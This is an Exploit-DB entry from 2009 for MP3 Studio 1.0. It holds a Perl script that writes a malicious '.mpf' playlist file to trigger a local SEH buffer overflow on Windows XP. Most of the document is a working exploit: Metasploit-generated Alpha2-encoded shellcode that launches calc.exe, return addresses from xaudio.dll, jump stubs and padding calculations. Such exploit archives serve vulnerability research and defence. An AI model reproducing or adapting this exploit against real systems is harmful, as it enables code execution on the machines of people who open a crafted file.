MP3 Studio 1.0 - '.mpf' Local Buffer Overflow (SEH)

EDB-ID:

9291

CVE:

N/A

Author:

Koshi

Type:

local

Platform:

Windows

Published:

2009-07-28

#!/usr/bin/perl
#
# MP3 Studio v1.0 (mpf File) Local BOF Exploit (SEH)
# Exploited by: Koshi
# Download: http://www.software112.com/products/mp3-millennium+download.html
# Based on PoC/findings by HACK4LOVE ( http://milw0rm.com/exploits/9277 )
# Tested on WinXP SP3
#
# I've used addresses from "xuadio.dll", which is shipped with the package.
#

# win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x49\x79\x4b\x4c\x4d".
"\x38\x43\x74\x67\x70\x63\x30\x67\x70\x4c\x4b\x41\x55\x37\x4c\x6c".
"\x4b\x41\x6c\x73\x35\x53\x48\x64\x41\x4a\x4f\x6c\x4b\x70\x4f\x67".
"\x68\x6c\x4b\x41\x4f\x57\x50\x45\x51\x5a\x4b\x53\x79\x4e\x6b\x74".
"\x74\x6c\x4b\x76\x61\x38\x6e\x64\x71\x59\x50\x6e\x79\x4e\x4c\x6b".
"\x34\x79\x50\x63\x44\x73\x37\x4a\x61\x69\x5a\x44\x4d\x76\x61\x6b".
"\x72\x7a\x4b\x4b\x44\x35\x6b\x50\x54\x77\x54\x65\x54\x71\x65\x4d".
"\x35\x6e\x6b\x61\x4f\x64\x64\x65\x51\x7a\x4b\x63\x56\x4c\x4b\x56".
"\x6c\x50\x4b\x4e\x6b\x43\x6f\x47\x6c\x65\x51\x6a\x4b\x6c\x4b\x55".
"\x4c\x6c\x4b\x64\x41\x68\x6b\x6d\x59\x63\x6c\x45\x74\x75\x54\x59".
"\x53\x36\x51\x4b\x70\x71\x74\x6e\x6b\x67\x30\x30\x30\x6f\x75\x6b".
"\x70\x30\x78\x64\x4c\x4c\x4b\x37\x30\x44\x4c\x6e\x6b\x54\x30\x47".
"\x6c\x6e\x4d\x6e\x6b\x53\x58\x75\x58\x6a\x4b\x76\x69\x4e\x6b\x6b".
"\x30\x6c\x70\x37\x70\x47\x70\x35\x50\x4c\x4b\x50\x68\x57\x4c\x51".
"\x4f\x35\x61\x6c\x36\x63\x50\x52\x76\x4f\x79\x6c\x38\x6b\x33\x6f".
"\x30\x31\x6b\x36\x30\x33\x58\x73\x4e\x69\x48\x6b\x52\x44\x33\x55".
"\x38\x6d\x48\x4b\x4e\x4d\x5a\x74\x4e\x50\x57\x4b\x4f\x48\x67\x71".
"\x73\x62\x41\x32\x4c\x45\x33\x56\x4e\x55\x35\x61\x68\x31\x75\x75".
"\x50\x66";

my $jmpe = "\x3f\x5e\x03\x10";			# 0x10035E3F jmp esp (xaudio.dll)
my $nseh = "\xeb\xf1\x90\x90";			# Get back to where we once belong.
my $eseh = "\xfd\x61\x03\x10";			# 0x100361FD jmp edi (xaudio.dll)
my $phun = "\x33\xc0\x33\x45\xf8\x04\x05\xff\xe0";
#
#	XOR EAX,EAX
#	XOR EAX,DWORD PTR SS:[EBP-8]
#	ADD AL,5
#	JMP EAX
#
my $leng = 4103 - length($shellcode) - length($phun);
my $buff = "\x41"x$leng;
my $tuff = "http:".$buff.$shellcode.$phun.$jmpe.$nseh.$eseh;

open (MYFILE, '>>exploit.mpf');
print MYFILE "$tuff";
close (MYFILE);
print "Exploit file has been created. ( exploit.mpf )\n";

# milw0rm.com [2009-07-28]